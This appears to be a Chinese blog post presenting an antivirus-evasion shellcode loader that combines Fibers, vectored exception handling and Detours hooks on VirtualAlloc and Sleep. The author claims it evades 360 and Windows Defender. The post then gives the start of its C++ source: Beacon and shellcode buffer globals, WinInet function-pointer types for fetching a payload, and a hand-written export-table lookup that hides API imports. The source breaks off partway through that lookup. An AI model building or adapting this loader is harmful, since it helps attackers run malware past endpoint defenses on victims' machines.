加载方式Fiber+VEH Hook Load
Fiber是纤程(免杀手法),VEH是向量化异常处理(异常触发时的回调),hook使用Detours来hook VirtualAlloc和Sleep,通过异常触发的回调实现主动hook
纤程Fiber的概念:纤程是比线程更小的一个运行单位。可以把一个线程拆分成多个纤程,然后通过人工切换纤程,从而让各个纤程工作。线程的实现是由Windows内核完成的,因此Windows可以自动对线程进行调度;而纤程是通过用户模式的代码来实现的,调度算法由程序员自己编写,内核并不知道纤程的实现方式,因此纤程是“非抢占”的调度方式


可以看到绕过360和Windows Defender杀软
手法是在ConsoleApplication15项目上改动的,之前的项目是VEH Hook Load加载方式,在此加载方式的基础上将线程改为纤程Fiber
全代码如下:
ConsoleApplication17_2.cpp
#include <iostream>
#include<Windows.h>
#include "detours.h"
#include "detver.h"
#include <WinInet.h>
#include "base64.h"
#include "AES.h"
#include "need.h"
#pragma comment(lib,"detours.lib")
#pragma comment(lib,"wininet")
#pragma warning(disable:4996)
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
extern "C" PVOID64 _cdecl GetPeb();
using namespace std;
// Loader-wide state shared with code outside this excerpt (the page text
// describes Detours hooks on VirtualAlloc/Sleep and a VEH handler; their
// definitions are not shown here). Only Vir_FLAG carries a non-zero
// initial value; every other global starts zeroed and is written elsewhere.
LPVOID  Beacon_address{};                      // buffer address — set by code not shown
SIZE_T  Beacon_data_len{};                     // length paired with Beacon_address
DWORD   Beacon_Memory_address_flOldProtect{};  // presumably a saved protection value — confirm against the writer
HANDLE  hEvent{};                              // event handle; creator/waiter not in this excerpt
BOOL    Vir_FLAG{ TRUE };                      // starts TRUE; meaning depends on the hook code not shown
LPVOID  shellcode_addr{};                      // second buffer address — set by code not shown
// Function-pointer aliases mirroring the Windows prototypes of VirtualAlloc
// and several WinInet calls. The page text says VirtualAlloc is hooked with
// Detours; how the WinInet aliases are bound (presumably through
// CustomGetProcAddress below) is not visible in this excerpt — confirm.
// SAL annotations are kept so the aliases still match the SDK declarations.
using VirtualAllocT = LPVOID(WINAPI*)(
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
);

using InternetOpenW_T = HINTERNET(WINAPI*)(
    _In_opt_ LPCWSTR lpszAgent,
    _In_ DWORD dwAccessType,
    _In_opt_ LPCWSTR lpszProxy,
    _In_opt_ LPCWSTR lpszProxyBypass,
    _In_ DWORD dwFlags
);

using InternetConnectW_T = HINTERNET(WINAPI*)(
    _In_ HINTERNET hInternet,
    _In_ LPCWSTR lpszServerName,
    _In_ INTERNET_PORT nServerPort,
    _In_opt_ LPCWSTR lpszUserName,
    _In_opt_ LPCWSTR lpszPassword,
    _In_ DWORD dwService,
    _In_ DWORD dwFlags,
    _In_opt_ DWORD_PTR dwContext
);

using HttpOpenRequestW_T = HINTERNET(WINAPI*)(
    _In_ HINTERNET hConnect,
    _In_opt_ LPCWSTR lpszVerb,
    _In_opt_ LPCWSTR lpszObjectName,
    _In_opt_ LPCWSTR lpszVersion,
    _In_opt_ LPCWSTR lpszReferrer,
    _In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,
    _In_ DWORD dwFlags,
    _In_opt_ DWORD_PTR dwContext
);

using HttpSendRequestW_T = HINTERNET(WINAPI*)(
    _In_ HINTERNET hRequest,
    _In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,
    _In_ DWORD dwHeadersLength,
    _In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,
    _In_ DWORD dwOptionalLength
);

// NOTE(review): the SDK declares InternetReadFile as returning BOOL, not
// HINTERNET; the alias below reproduces the page's declaration unchanged —
// confirm against the call site that assigns it.
using InternetReadFile_T = HINTERNET(WINAPI*)(
    _In_ HINTERNET hFile,
    _Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,
    _In_ DWORD dwNumberOfBytesToRead,
    _Out_ LPDWORD lpdwNumberOfBytesRead
);
FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
// Get the address of the module's PE header
BYTE* pImageBase = (BYTE*)hModule;
IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;
IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);
// Get the address of the export directory
IMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);
DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);
WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);
DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);
for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);
if (strcmp(lpProcName, pName) == 0) {
WORD ordinal = pAddressOfNameOrdinals[i];
DWORD functionRVA = pAddressOfFunctions[ordinal];
FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);
return pFunction;
}</




